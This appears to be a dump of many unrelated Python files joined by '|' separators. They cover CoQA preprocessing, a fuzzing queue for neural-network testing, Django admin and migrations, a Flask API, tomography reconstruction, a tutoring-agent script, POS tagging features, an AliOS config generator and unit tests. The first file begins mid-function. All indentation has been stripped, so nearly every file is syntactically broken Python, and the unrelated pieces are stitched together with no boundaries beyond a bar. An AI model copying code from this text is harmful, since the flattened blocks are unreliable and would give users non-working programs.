tgt_tokens=word_tokenize(tgt)
true_head="<none>"
for h in q_head:
if h in tgt_tokens:
true_head=h
break
return true_head
def modify(sentence,question_interro):
#head=head_find(question)
"""
if answer in sentence:
sentence=sentence.replace(answer," ans_rep_tag ")
"""
#sentence=" ".join([sentence,"ans_pos_tag",answer,"interro_tag",question_interro])
sentence=" ".join([sentence,"interro_tag",question_interro])
return sentence
def modify_history(history,now):
#head=head_find(question)
"""
if answer in sentence:
sentence=sentence.replace(answer," ans_rep_tag ")
"""
#sentence=" ".join([sentence,"ans_pos_tag",answer,"interro_tag",question_interro])
sentence=" ".join([history,"history_append_tag",now])
return sentence
def history_maker(neg_interro,question_interro):
interro_list=["what","where","who","why","which","whom","how",""]
while True:
index=random.randrange(len(interro_list))
if interro_list[index]!=question_interro.split()[0]:
break
question=interro_list[index]+" "+neg_interro
return question
def c2wpointer(context_text,context,answer_start,answer_end):#answer_start,endをchara単位からword単位へ変換
#nltk.tokenizeを使って分割
#ダブルクオテーションがなぜか変化するので処理
token_id={}
cur_id=0
for i,token in enumerate(context):
start=context_text.find(token,cur_id)
token_id[i]=(start,start+len(token))
cur_id=start+len(token)
for i in range(len(token_id)):
if token_id[i][0]<=answer_start and answer_start<=token_id[i][1]:
answer_start_w=i
break
for i in range(len(token_id)):
if token_id[i][0]<=answer_end and answer_end<=token_id[i][1]:
answer_end_w=i
break
return answer_start_w,answer_end_w
#sentenceを受け取り、tokenizeして返す
def tokenize(sent):
return [token.replace('``','"').replace("''",'"') for token in word_tokenize(sent)]
#context_textを文分割して、answer_start~answer_end(char単位)のスパンが含まれる文を返す
#やってることはc2iと多分同じアルゴリズム
def answer_find(context_text,answer_start,answer_end,answer_replace):
context=sent_tokenize(context_text)
sent_start_id=-1
sent_end_id=-1
start_id_list=[context_text.find(sent) for sent in context]
end_id_list=[start_id_list[i+1] if i+1!=len(context) else len(context_text) for i,sent in enumerate(context)]
for i,sent in enumerate(context):
start_id=start_id_list[i]
end_id=end_id_list[i]
if start_id<=answer_start and answer_start<=end_id:
sent_start_id=i
if start_id<=answer_end and answer_end<=end_id:
sent_end_id=i
print(sent_start_id,sent_end_id)
if sent_start_id==-1 or sent_end_id==-1:
#sys.exit(-1)
print("error")
#sys.exit(-1)
answer_sent=" ".join(context[sent_start_id:sent_end_id+1])
#ここで答えを置換する方法。ピリオドが消滅した場合などに危険なので止める。
"""
if answer_replace:
context_text=context_text.replace(context[answer_start:answer_end],"<answer_word>")
answer_sent=sent_tokenize(context_text)[sent_start_id]
"""
return answer_sent
def data_process(input_path,out_path):
with open(input_path,"r") as f:
data=json.load(f)
contexts=[]
questions=[]
answer_starts=[]
answer_ends=[]
answer_texts=[]
answers=[]
sentences=[]
ids=[]
dump_data=[]
corenlp=CoreNLP()
for paragraph in tqdm(data["data"]):
context_text=paragraph["story"].lower()
question_history=[]
interro_history=[]
for i in range(len(paragraph["questions"])):
question_dict=paragraph["questions"][i]
answer_dict=paragraph["answers"][i]
question_text=question_dict["input_text"].lower()
answer_text=answer_dict["input_text"].lower()
question_history.append(question_text)
span_start=answer_dict["span_start"]
span_end=answer_dict["span_end"]
span_text=answer_dict["span_text"]
turn_id=paragraph["questions"][i]["turn_id"]
interro,non_interro,vb_check=corenlp.forward_verbcheck(question_text)
if len(interro)==0:
interro=""
elif "?" in interro:
interro=" ".join(interro)
else:
interro=" ".join(interro+["?"])
non_interro=" ".join(non_interro)
dump_data.append({"interro":interro,
"noninterro":non_interro,
"vb_check":vb_check})
with open(out_path,"w")as f:
json.dump(dump_data,f,indent=4)
#main
#coqaのjsonファイルからcorenlpを用いて疑問詞句を前もって抽出
version="1.1"
type=""
data_process(input_path="data/coqa-dev-v1.0.json",
out_path="data/coqa-interro-dev.json"
)
data_process(input_path="data/coqa-train-v1.0.json",
out_path="data/coqa-interro-train.json"
)
|
import time
import numpy as np
from random import randint
import tensorflow as tf
import datetime
import random
import os
class Seed(object):
"""Class representing a single element of a corpus."""
def __init__(self, cl, coverage, root_seed, parent, metadata, ground_truth, l0_ref=0, linf_ref=0):
"""Inits the object.
Args:
cl: a transformation state to represent whether this seed has been
coverage: a list to show the coverage
root_seed: maintain the initial seed from which the current seed is sequentially mutated
metadata: the prediction result
ground_truth: the ground truth of the current seed
l0_ref, linf_ref: if the current seed is mutated from affine transformation, we will record the l0, l_inf
between initial image and the reference image. i.e., L0(s_0,s_{j-1}) L_inf(s_0,s_{j-1}) in Equation 2 of the paper
Returns:
Initialized object.
"""
self.clss = cl
self.metadata = metadata
self.parent = parent
self.root_seed = root_seed
self.coverage = coverage
self.queue_time = None
self.id = None
# The initial probability to select the current seed.
self.probability = 0.8
self.fuzzed_time = 0
self.ground_truth = ground_truth
self.l0_ref = l0_ref
self.linf_ref = linf_ref
class FuzzQueue(object):
"""Class that holds inputs and associated coverage."""
def __init__(self, outdir, is_random, sample_type, cov_num, criteria):
"""Init the class.
"""
self.plot_file = open(os.path.join(outdir, 'plot.log'), 'a+')
self.out_dir = outdir
self.mutations_processed = 0
self.queue = []
self.sample_type = sample_type
self.start_time = time.time()
# whether it is random testing
self.random = is_random
self.criteria = criteria
self.log_time = time.time()
# Like AFL, it records the coverage of the seeds in the queue
self.virgin_bits = np.full(cov_num, 0xFF, dtype=np.uint8)
# self.adv_bits = np.full(cov_num, 0xFF, dtype=np.uint8)
self.uniq_crashes = 0
self.total_queue = 0
self.total_cov = cov_num
# Some log information
self.last_crash_time = self.start_time
self.last_reg_time = self.start_time
self.current_id = 0
self.seed_attacked = set()
self.seed_attacked_first_time = dict()
self.dry_run_cov = None
# REG_MIN and REG_GAMMA are the p_min and gamma in Equation 3
self.REG_GAMMA = 5
self.REG_MIN = 0.3
self.REG_INIT_PROB = 0.8
def has_new_bits(self, seed):
temp = np.invert(seed.coverage, dtype = np.uint8)
cur = np.bitwise_and(self.virgin_bits, temp)
has_new = not np.array_equal(cur, self.virgin_bits)
if has_new:
# If the coverage is increased, we will update the coverage
self.virgin_bits = cur
return has_new or self.random
def plot_log(self, id):
# Plot the data during fuzzing, include: the current time, current iteration, length of queue, initial coverage,
# total coverage, number of crashes, number of seeds that are attacked, number of mutations, mutation speed
queue_len = len(self.queue)
coverage = self.compute_cov()
current_time = time.time()
self.plot_file.write(
"%d,%d,%d,%s,%s,%d,%d,%s,%s\n" %
(time.time(),
id,
queue_len,
self.dry_run_cov,
coverage,
self.uniq_crashes,
len(self.seed_attacked),
self.mutations_processed,
round(float(self.mutations_processed) / (current_time - self.start_time), 2)
))
self.plot_file.flush()
def write_logs(self):
log_file = open(os.path.join(self.out_dir, 'fuzz.log'), 'w+')
for k in self.seed_attacked_first_time:
log_file.write("%s:%s\n"%(k, self.seed_attacked_first_time[k]))
log_file.close()
self.plot_file.close()
def log(self):
queue_len = len(self.queue)
coverage = self.compute_cov()
current_time = time.time()
tf.logging.info(
"Metrics %s | corpus_size %s | crashes_size %s | mutations_per_second: %s | total_exces %s | last new reg: %s | last new adv %s | coverage: %s -> %s%%",
self.criteria,
queue_len,
self.uniq_crashes,
round(float(self.mutations_processed)/(current_time - self.start_time), 2),
self.mutations_processed,
datetime.timedelta(seconds=(time.time() - self.last_reg_time)),
datetime.timedelta(seconds=(time.time() - self.last_crash_time)),
self.dry_run_cov,
coverage
)
def compute_cov(self):
# Compute the current coverage in the queue
coverage = round(float(self.total_cov - np.count_nonzero(self.virgin_bits == 0xFF)) * 100 / self.total_cov, 2)
return str(coverage)
def tensorfuzz(self):
"""Grabs new input from corpus according to sample_function."""
# choice = self.sample_function(self)
corpus = self.queue
reservoir = corpus[-5:] + [random.choice(corpus)]
choice = random.choice(reservoir)
return choice
# return random.choice(self.queue)
def select_next(self):
# Different seed selection strategies (See details in Section 4)
if self.random == 1 or self.sample_type == 'uniform':
return self.random_select()
elif self.sample_type == 'tensorfuzz':
return self.tensorfuzz()
elif self.sample_type == 'deeptest':
return self.deeptest_next()
elif self.sample_type == 'prob':
return self.prob_next()
def random_select(self):
return random.choice(self.queue)
def deeptest_next(self):
choice = self.queue[-1]
return choice
def fuzzer_handler(self, iteration, cur_seed, bug_found, coverage_inc):
# The handler after each iteration
if self.sample_type == 'deeptest' and not coverage_inc:
# If deeptest cannot increase the coverage, it will pop the last seed from the queue
self.queue.pop()
elif self.sample_type == 'prob':
# Update the probability based on the Equation 3 in the paper
if cur_seed.probability > self.REG_MIN and cur_seed.fuzzed_time < self.REG_GAMMA * (1 - self.REG_MIN):
cur_seed.probability = self.REG_INIT_PROB - float(cur_seed.fuzzed_time) / self.REG_GAMMA
if bug_found:
# Log the initial seed from which we found the adversarial. It is for the statics of Table 6
self.seed_attacked.add(cur_seed.root_seed)
if not (cur_seed.parent in self.seed_attacked_first_time):
# Log the information about when (which iteration) the initial seed is attacked successfully.
self.seed_attacked_first_time[cur_seed.root_seed] = iteration
def prob_next(self):
"""Grabs new input from corpus according to sample_function."""
while True:
if self.current_id == len(self.queue):
self.current_id = 0
cur_seed = self.queue[self.current_id]
if randint(0,100) < cur_seed.probability * 100:
# Based on the probability, we decide whether to select the current seed.
cur_seed.fuzzed_time += 1
self.current_id += 1
return cur_seed
else:
self.current_id += 1
|
from django.contrib import admin
from .models import Newsletter, Recruitment
# Register your models here.
@admin.register(Newsletter)
class NewsletterAdmin(admin.ModelAdmin):
display = ('full_name', 'full_name', 'time_stamp')
@admin.register(Recruitment)
class RecruitmentAdmin(admin.ModelAdmin):
display = ('user', 'gender', 'date_created') |
import tkinter as tk
import numpy
from PIL import Image, ImageTk
class ImageLabel(tk.Label):
"""A label with an updatable image."""
def update_image(self, image: numpy.ndarray) -> None:
"""Update the label with the given image."""
display_image = Image.fromarray(image)
display_image = ImageTk.PhotoImage(display_image)
self.config(image=display_image)
self.image = display_image
|
from flask import request, current_app
from flask_restful import Resource
from app import models
from app.api.schemas import CountdownResultSchema, CountdownResultsWithAdditionalDataSchema, CountdownResultsQuerySchema
from app.auth.views import current_user, authorized_or_403
from app.models import CountdownResult, db
class CountdownResultAPI(Resource):
def __init__(self):
self.schema = CountdownResultSchema(many=True)
self.get_schema = CountdownResultsWithAdditionalDataSchema(many=False)
self.query_schema = CountdownResultsQuerySchema()
@authorized_or_403
def get(self, id=None):
filters = self.query_schema.loads(request.args['data'])
countdown_results, total = models.CountdownResult.find_by_query_parameter(filters, current_user.id)
response = dict(data=countdown_results, totalNumber=total)
return self.get_schema.jsonify(response)
@authorized_or_403
def post(self, id=None):
current_app.logger.info("Request data: %s", request.form)
data = self.schema.loads(request.form['data'])
if data:
db_entries = [CountdownResult(entry['start_date'], entry['finish_date'], entry['success'], current_user.id)
for entry in data]
db.session.add_all(db_entries)
db.session.commit()
return 'ok', 201
@authorized_or_403
def delete(self, id=None):
current_app.logger.info('Got DELETE REQUEST')
CountdownResult.delete_all_by_user_id(current_user.id)
db.session.commit()
current_app.logger.info('Countdown results has been successfully deleted.')
|
import pymr
import time
class IndexInverter(pymr.Solver):
def reader(self):
with open('testcases/index.txt', 'r') as f:
return f.read().strip().split('\n')
def mapper(self, value):
time.sleep(0.1)
value = value.split()
for i in value[1:]:
yield i, value[0]
def reducer(self, key, values):
time.sleep(0.1)
yield key, ','.join(values)
if __name__ == '__main__':
solver = IndexInverter()
solver.solve()
solver.print_result() |
# Modules
import os
import sys
import tifffile
import numpy as np
import opt_functions as opt
import matplotlib.pyplot as plt
from pathlib import Path
# Data paths
proj_folder = Path(r'D:\OPTReconstructionData\M3_523_17wNIF_ASMA_Projections')
recon_folder = Path(r'C:\Users\david\Desktop\M3_523_17wNIF_ASMA_Reconstruction')
prefix = 'recon_'
# Initializations
proj_names = os.listdir(proj_folder)
proj_path = proj_folder / proj_names[0]
proj = tifffile.imread(str(proj_path))
height, width = proj.shape
angles = len(proj_names)
theta = np.linspace(0, 2 * np.pi, angles)
cor = np.zeros(height)
tentative_cor = width // 2
coarse_range = 30
coarse_range = range(-coarse_range, coarse_range+1)
coarse_step = 1
init_fine_range = 7
init_fine_range = range(-init_fine_range, init_fine_range+1)
fine_range = 2
fine_range = range(-fine_range, fine_range+1)
fine_step = 0.125
max_height = 100
tomo_height = max_height
tomo_init = height // 2
tomo_start = tomo_init
tomo_indx = tomo_start
tomo_stop = tomo_start + min(tomo_height, height)
options = {'proj_type': 'cuda', 'method': 'FBP_CUDA'}
processing = True
init_cor = True
ascending = True
height_exception = False
print('Reconstruction started ...')
opt.tic()
max_prog = 50
global_indx = 0
if height < max_prog:
progress_bar = False
else:
progress_bar = True
# Start tomogram processing
while processing:
# Special case: trailing portions of the tomogram
if height_exception:
tomo_height = tomo_stop - tomo_start
# Read tomogram
tomo = np.zeros((angles, tomo_height, width))
opt.read_tomo(str(proj_folder),
proj_names,
angles,
tomo,
tomo_start,
tomo_stop)
# Initialize the center of rotation
if init_cor:
tentative_cor = opt.coarse_scan_cor(coarse_range,
coarse_step,
tentative_cor,
tomo[:, 0, None, :],
theta,
options)
tentative_cor, _ = opt.fine_scan_cor(init_fine_range,
fine_step,
tentative_cor,
tomo[:, 0, None, :],
theta,
options)
center_cor = tentative_cor
init_cor = False
if progress_bar:
print('|' + max_prog*'-' + '| Reconstruction progress')
sys.stdout.write('|'); sys.stdout.flush();
part_prog = 0
# Reconstruct tomogram
if ascending:
slice_range = range(tomo_height)
else:
slice_range = range(tomo_height-1, -1, -1)
for slice_indx in slice_range:
tentative_cor, recon = opt.fine_scan_cor(fine_range,
fine_step,
tentative_cor,
tomo[:, slice_indx, None, :],
theta,
options)
cor[tomo_indx] = tentative_cor
# Save individual slices
recon_name = (prefix
+ '{:0>4d}'.format(tomo_indx)
+ '.tif')
save_path = recon_folder / recon_name
tifffile.imsave(save_path, recon)
if progress_bar:
if (global_indx >= part_prog*height/max_prog):
sys.stdout.write('*'); sys.stdout.flush();
part_prog += 1
if (global_indx >= height-1):
sys.stdout.write('| done \n'); sys.stdout.flush();
global_indx += 1
if ascending:
tomo_indx += 1
else:
tomo_indx -= 1
# Adjust tomogram indexes for next iteration
if height_exception:
tomo_height = max_height
height_exception = False
if ascending:
if tomo_stop == height:
ascending = False
tentative_cor = center_cor
tomo_indx = tomo_init - 1
tomo_stop = tomo_init
tomo_start = tomo_stop - tomo_height
else:
tomo_start += tomo_height
tomo_stop += tomo_height
if tomo_stop > height:
tomo_stop = height
height_exception = True
else:
if tomo_start == 0:
processing = False
else:
tomo_start -= tomo_height
tomo_stop -= tomo_height
if tomo_start < 0:
tomo_start = 0
height_exception = True
# Plot the list of centers of rotation used
plt.figure()
plt.plot(cor)
# Complete processing
eta_s = int(opt.toc())
eta_m = eta_s // 60
eta_s -= eta_m * 60
print(('Reconstruction complete (elapsed time: '
+ str(eta_m)
+ ' minutes, and '
+ str(eta_s)
+ ' seconds)')) |
import gym
from stable_baselines.common import make_vec_env
from stable_baselines.common.policies import MlpPolicy
from stable_baselines import PPO2
import tutorenvs
from tutorenvs.multicolumn import MultiColumnAdditionDigitsEnv
from tutorenvs.multicolumn import MultiColumnAdditionSymbolic
import numpy as np
from pprint import pprint
from concept_formation.cobweb3 import Cobweb3Tree
from concept_formation.visualize import visualize
from tutorenvs.utils import DataShopLogger
def train_tree(n=10, logger=None):
tree = Cobweb3Tree()
env = MultiColumnAdditionSymbolic(logger=logger)
p = 0
nhints = 0
while p < n:
# make a copy of the state
state = {a: env.state[a] for a in env.state}
env.render()
concept = tree.categorize(state)
sel = concept.predict('selection')
inp = concept.predict('input')
if sel == "done":
act = 'ButtonPressed'
else:
act = "UpdateField"
sai = (sel, act, inp)
if sel is None or inp is None:
nhints += 1
sai = env.request_demo()
sai = (sai[0], sai[1], sai[2]['value'])
reward = env.apply_sai(sai[0], sai[1], {'value': sai[2]})
# print('reward', reward)
if reward < 0:
nhints += 1
sai = env.request_demo()
sai = (sai[0], sai[1], sai[2]['value'])
reward = env.apply_sai(sai[0], sai[1], {'value': sai[2]})
state['selection'] = sai[0]
state['input'] = str(sai[2])
tree.ifit(state)
if sai[0] == "done" and reward == 1.0:
print('# hints =', nhints)
nhints = 0
print("Problem %s of %s" % (p, n))
p += 1
return tree
if __name__ == "__main__":
logger = DataShopLogger('MulticolumnAdditionTutor', extra_kcs=['field'])
for _ in range(1):
tree = train_tree(200, logger)
visualize(tree)
# env = MultiColumnAdditionSymbolic()
# while True:
# sai = env.request_demo()
# env.apply_sai(sai[0], sai[1], sai[2])
# env.render()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-23 11:47
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('todo', '0004_auto_20161023_1133'),
]
operations = [
migrations.AddField(
model_name='board',
name='color',
field=models.CharField(choices=[(1, '#25a2a6'), (2, '#a4d05f'), (3, '#fddd62'), (4, '#f48f97')], default=1, max_length=7),
),
]
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db.models import F
from django.dispatch import receiver
from machina.apps.forum.signals import forum_viewed
@receiver(forum_viewed)
def update_forum_redirects_counter(sender, forum, user, request, response, **kwargs):
"""
Receiver to handle the update of the link redirects counter associated with link forums.
"""
if forum.is_link and forum.link_redirects:
forum.link_redirects_count = F('link_redirects_count') + 1
forum.save()
|
from .base_feature import BaseFeature
class POSFeature(BaseFeature):
def word2features(self, s, i):
word = s[i][0]
features = {
'bias' : 1.0,
'[0]' : word,
'[0].lower' : word.lower(),
'[0].istitle': all(w.istitle() for w in word.split('_')),
}
if i > 0:
word1 = s[i - 1][0]
pos1 = s[i - 1][1]
features.update({
'[-1]' : word1,
'[-1].lower' : word1.lower(),
'[-1].istitle': all(w.istitle() for w in word1.split('_')),
'[-1].pos' : pos1,
'[-1,0]' : "%s %s" % (word1, word)
})
if i > 1:
word2 = s[i - 2][0]
pos2 = s[i - 2][1]
features.update({
'[-2]': word2,
'[-2].lower' : word2.lower(),
'[-2].istitle': all(w.istitle() for w in word2.split('_')),
'[-2].pos' : pos2,
'[-2,-1]' : "%s %s" % (word2, word1),
'[-2,-1].pos' : "%s %s" % (pos2, pos1)
})
if i > 2:
pos3 = s[i - 3][1]
features.update({
'[-3].pos' : pos3,
'[-3,-2].pos' : "%s %s" % (pos3, pos2),
})
else:
features['[-3].BOS'] = True
else:
features['[-2].BOS'] = True
else:
features['[-1].BOS'] = True
if i < len(s) - 1:
word1 = s[i + 1][0]
features.update({
'[+1]' : word1,
'[+1].lower' : word1.lower(),
'[+1].istitle': all(w.istitle() for w in word1.split('_')),
'[0,+1]' : "%s %s" % (word, word1)
})
if i < len(s) - 2:
word2 = s[i + 2][0]
features.update({
'[+2]' : word2,
'[+2].lower' : word2.lower(),
'[+2].istitle': all(w.istitle() for w in word2.split('_')),
'[+1,+2]' : "%s %s" % (word1, word2)
})
else:
features['[+2].EOS'] = True
else:
features['[+1].EOS'] = True
return features
|
from unittest import TestCase
from similarityPy.algorithms.standart_deviation import StandartDeviation
from tests import test_logger
__author__ = 'cenk'
class StandartDeviationTest(TestCase):
def setUp(self):
pass
def test_algorithm_with_list(self):
test_logger.debug("StandartDeviationTest - test_algorithm_with_list Starts")
standart_deviation = StandartDeviation()
data_list = [1, 2, 3, 4, 5]
self.assertEquals(1.5811, standart_deviation.calculate(data_list))
data_list = [1, 2, 3, 4]
self.assertEquals(1.291, standart_deviation.calculate(data_list))
test_logger.debug("StandartDeviationTest - test_algorithm_with_list Ends")
def test_algorithm_with_tuple(self):
test_logger.debug("StandartDeviationTest - test_algorithm_with_tuple Starts")
standart_deviation = StandartDeviation()
data_list = [("a", 1), ("b", 2), ("c", 3), ( "d", 4), ("e", 5)]
self.assertEquals(1.5811, standart_deviation.calculate(data_list, is_tuple=True, index=1))
data_list = [("a", "a", 1), ("b", "b", 2), ("c", "c", 3), ("d", "d", 4), ("e", "e", 5)]
self.assertEquals(1.5811, standart_deviation.calculate(data_list, is_tuple=True, index=2))
data_list = [("a", "a", 1), ("b", "b", 2), ("c", "c", 3), ("d", "d", 4)]
self.assertEquals(1.291, standart_deviation.calculate(data_list, is_tuple=True, index=2))
test_logger.debug("StandartDeviationTest - test_algorithm_with_tuple Ends") |
#!/usr/bin/env python
import os, sys, re
import shutil
from aos_parse_components import get_comp_name
# Global definitions
top_config_in = "build/Config.in"
board_config_in = "board/Config.in"
example_config_in = "app/example/Config.in"
profile_config_in = "app/profile/Config.in"
autogen_start = "--- Generated Automatically ---"
autogen_end = "--- End ---"
def update_config_in(config_file, config_list):
""" Update Config.in file that copied from template """
patten = re.compile(r'\s*source (.*)')
config_contents = []
with open (config_file, "r") as cf:
for line in cf.readlines():
prefix = ""
match = patten.match(line)
if match:
config_tmp = match.group(1)
if "linkkit/" in config_file and "$SRCPATH" in config_tmp:
config_tmp = re.sub(r"\$SRCPATH/", "middleware/linkkit/sdk-c/", config_tmp)
if not re.sub(r'"', "", config_tmp) in config_list:
continue
config_contents += [line]
if config_contents:
with open (config_file, "w") as cf:
for line in config_contents:
cf.write(line)
def get_opt_config(config_file, keyword, sdir):
patten = re.compile(r"\s+select\s+(%s.*?)(\s+if.*)?$" % keyword)
opt_name = ""
opt_config = ""
with open(config_file, "r") as f:
for line in f.readlines():
match = patten.match(line)
if match:
opt_name = match.group(1)
if opt_name:
patten = re.compile(r"^(menuconfig|config)\s+(%s)$" % opt_name)
for root, dirs, files in os.walk(sdir):
if 'Config.in' in files:
if root == sdir:
continue
with open("%s/Config.in" % root, "r") as f:
line = f.readline().strip()
match = patten.match(line)
if match:
opt_config = "%s/Config.in" % root
if opt_config:
break
#if not opt_name:
# print("Warning: Can't found %s from %s ..." % (keyword, config_file))
#if opt_name and not opt_config:
# print("Warning: The option is not defined %s ..." % (opt_name))
return (opt_name, opt_config)
def create_board_config_in(config_file, config_list):
""" Create board/Config.in """
with open (config_file, "w") as cf:
cf.write("# %s\n" % autogen_start)
cf.write("menu \"BSP Configuration\"\n")
cf.write("choice\n")
cf.write(" prompt \"Select board\"\n")
cf.write("\n")
for config in config_list:
patten = re.compile(r"^(menuconfig|config)\s+(AOS_BOARD_.*)$")
config_name = ""
with open(config, "r") as f:
for line in f.readlines():
match = patten.match(line.strip())
if match:
config_name = match.group(2)
break
else:
print("Error: boardname empty!")
return 1
patten = re.compile(r".*board/(.*)/Config.in")
match = patten.match(config)
if match:
boarddir = match.group(1).replace("/", ".")
else:
print("Error: can't get board directory")
cf.write("source \"%s\"\n" % config)
cf.write("if %s\n" % config_name)
cf.write(" config AOS_BUILD_BOARD\n")
cf.write(" default \"%s\"\n" % boarddir)
cf.write("\n")
(mcu_name, mcu_config) = get_opt_config(config, "AOS_MCU_", "platform/mcu")
if mcu_config:
cf.write(" source \"%s\"\n" % mcu_config)
(arch_name, arch_config) = get_opt_config(mcu_config, "AOS_ARCH_", "platform/arch")
if arch_config:
cf.write(" source \"%s\"\n" % arch_config)
cf.write("endif\n")
cf.write("\n")
cf.write("endchoice\n")
cf.write("\n")
cf.write("endmenu\n")
cf.write("# %s\n" % autogen_end)
def create_app_config_in(config_file, config_list):
""" Create app/*/Config.in files """
with open (config_file, "w") as cf:
cf.write("# %s\n" % autogen_start)
if "example/" in config_file:
cf.write("config AOS_APP_EXAMPLE\n")
cf.write(" bool \"Builtin Examples\"\n")
cf.write("\n")
cf.write("if AOS_APP_EXAMPLE\n")
cf.write("choice\n")
cf.write(" prompt \"Select example\"\n")
if "profile/" in config_file:
cf.write("config AOS_APP_PROFILE\n")
cf.write(" bool \"Builtin Profiles\"\n")
cf.write("\n")
cf.write("if AOS_APP_PROFILE\n")
cf.write("choice\n")
cf.write(" prompt \"Select profile\"\n")
cf.write("\n")
for config in config_list:
mkfile = re.sub(r"Config.in", r"aos.mk", config)
appname = get_comp_name(mkfile)
if not appname:
print("Error: Can't get app name from %s" % mkfile)
return 1
patten = re.compile(r"app/(example|profile)/(.*)/Config.in")
match = patten.match(config)
if match:
appdir = match.group(2).replace("/", ".")
else:
print("Error: can't get app directory")
cf.write("source \"%s\"\n" % config)
cf.write("if AOS_APP_%s\n" % appname.upper())
cf.write(" config AOS_BUILD_APP\n")
cf.write(" default \"%s\"\n" % appdir)
cf.write("endif\n")
cf.write("\n")
cf.write("endchoice\n")
cf.write("endif\n")
cf.write("# %s\n" % autogen_end)
def update_top_config_in(top_config_in):
""" Extra updates for build/Config.in """
contents = []
patten = re.compile(r".*(NULL|Null).*")
with open (top_config_in, "r") as cf:
for line in cf.readlines():
match = patten.match(line)
if match:
continue
contents += [line]
with open (top_config_in, "w") as cf:
for line in contents:
cf.write(line)
def main():
if not os.path.isfile("build/Makefile"):
print("Error: %s must be run in Sources Root dir!\n" % sys.argv[0])
return 1
config_list = []
source_root = "./"
for root, dirs, files in os.walk(source_root):
if 'Config.in' in files:
config_file = "%s/Config.in" % root.replace(source_root, "")
config_list += [config_file]
if os.path.isfile("middleware/linkkit/sdk-c/Config.linkkit"):
config_list += ["middleware/linkkit/sdk-c/Config.linkkit"]
# Update config files according to installed comps
for config_file in config_list:
update_config_in(config_file, config_list)
# Create board/Config.in
board_config_list = []
for config_file in config_list:
if config_file.startswith("board/") and config_file != "board/Config.in":
board_config_list += [config_file]
if board_config_list:
create_board_config_in(board_config_in, board_config_list)
# Create app/example/Config.in
example_config_list = []
for config_file in config_list:
if config_file.startswith("app/example") and config_file != "app/example/Config.in":
example_config_list += [config_file]
if example_config_list:
create_app_config_in(example_config_in, example_config_list)
# Create app/profile/Config.in
profile_config_list = []
for config_file in config_list:
if config_file.startswith("app/profile") and config_file != "app/profile/Config.in":
profile_config_list += [config_file]
if profile_config_list:
create_app_config_in(profile_config_in, profile_config_list)
# Extra update for build/Config.in
update_top_config_in(top_config_in)
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
"""
@author:XuMing(xuming624@qq.com)
@description:
"""
import addressparser
if __name__ == '__main__':
location_str = ["徐汇区虹漕路461号58号楼5楼",
"泉州市洛江区万安塘西工业区",
"朝阳区北苑华贸城",
"上海浦东新区城区昌邑路1669弄7号602(苗圃路口)",
"湖北天门市渔薪镇湖北省天门市三渔薪镇王湾村六组",
"收货人:xxx, 地址:湖北恩施州建始县业州镇湖北省建始县桂苑小区二单元111-2, 电话:13593643115",
"收货人:木鱼, 地址:浙江嘉兴市海宁市许村镇浙江省海宁市许村镇茗山村徐家石桥1号, 电话:13593643115",
]
df = addressparser.transform(location_str, cut=False)
print(df)
for map_key in zip(df["省"], df["市"], df["区"]):
print(map_key)
|
c = 0
chk = 1
for _ in ' '*int(input()):
if input() == 'A':
c += 1
else:
if c > 0:
c -=1
else:
chk = 0
print("YES" if chk and c == 0 else "NO") |
# Imports
import numpy as np
from stablab.profile_solve_guess import profile_solve_guess
"""get_profile gets the profile of a """
def get_profile(p, s, tol=1e-8, sL=-10, sR=10, num_inf=2, timeout = 10):
# Set up the passed arguments into s.
s.update({'L': sL, 'R': sR})
max_err = 1+tol
# Begin solving until the error is small enough.
while max_err > tol:
# Solve the profile using the pseudo method.
[s,p] = profile_solve_guess(s,p,num_inf)
# Update the max_err to reflect the current profile.
max_err = max(abs(s['sol']['deval'](s['L'])[0] - np.array([s['UL']]).T))
max_err = max(max_err, max(abs(s['sol']['deval'](s['R'])[0] - np.array([s['UR']]).T)))
# Update numerical infinity to attempt a wider domain.
num_inf = 2*num_inf
# Update the timeout variable.
timeout -= 1
if timeout == 0:
print('Failed to solve the profile with timeout = '+str(timeout))
return s,p
print()
print('Boundary Error', max_err)
print('Ode Error', s['sol']['ode_err'])
print('Tol', tol)
#print(s['sol']['ode_err_full'])
# Return s, the solution and p, the parameters.
return s,p
|
# -*- coding: utf-8 -*-
import unittest
import tempfile
from os.path import join
from os.path import pardir
from os.path import sep
from collections import namedtuple
from calmjs.parse import utils
class UtilsTestCase(unittest.TestCase):
def setUp(self):
self.old_dist = utils.ply_dist
self.py_major = utils.py_major
def tearDown(self):
utils.ply_dist = self.old_dist
utils.py_major = self.py_major
def test_name_something(self):
# a quick and dirty
utils.ply_dist = namedtuple('Distribution', ['version'])('3.00')
utils.py_major = 2
lextab, yacctab = utils.generate_tab_names('some.package')
self.assertEqual(lextab, 'some.lextab_package_py2_ply3_00')
self.assertEqual(yacctab, 'some.yacctab_package_py2_ply3_00')
def test_name_unknown(self):
utils.ply_dist = None
utils.py_major = 3
lextab, yacctab = utils.generate_tab_names('some.package')
self.assertEqual(lextab, 'some.lextab_package_py3_plyunknown')
self.assertEqual(yacctab, 'some.yacctab_package_py3_plyunknown')
def test_repr_compat(self):
class fake_unicode(object):
def __repr__(self):
return "u'fake'"
previous = utils.unicode
self.addCleanup(setattr, utils, 'unicode', previous)
utils.unicode = fake_unicode
self.assertEqual("'fake'", utils.repr_compat(fake_unicode()))
utils.unicode = None
self.assertEqual("u'fake'", utils.repr_compat(fake_unicode()))
class FileNormTestCase(unittest.TestCase):
def test_find_common_same_base_same_level(self):
base = tempfile.mktemp()
source = join(base, 'src', 'file.js')
source_alt = join(base, 'src', 'alt', 'file.js')
source_min = join(base, 'src', 'file.min.js')
source_map = join(base, 'src', 'file.min.js.map')
# for generation of sourceMappingURL comment in source_min
self.assertEqual(
'file.min.js.map', utils.normrelpath(source_min, source_map))
# for pointing from source_map.source to the source
self.assertEqual(
'file.js', utils.normrelpath(source_map, source))
# for pointing from source_map.source to the source_min
self.assertEqual(
'file.min.js', utils.normrelpath(source_map, source_min))
self.assertEqual(
join('alt', 'file.js'), utils.normrelpath(source_map, source_alt))
def test_find_common_same_base_parents_common(self):
base = tempfile.mktemp()
source = join(base, 'src', 'file.js')
source_min = join(base, 'build', 'file.min.js')
source_map = join(base, 'build', 'file.min.js.map')
# mapping from source_map to source
self.assertEqual([pardir, 'src', 'file.js'], utils.normrelpath(
source_map, source).split(sep))
# for pointing from source_map.source to the source_min
self.assertEqual('file.min.js', utils.normrelpath(
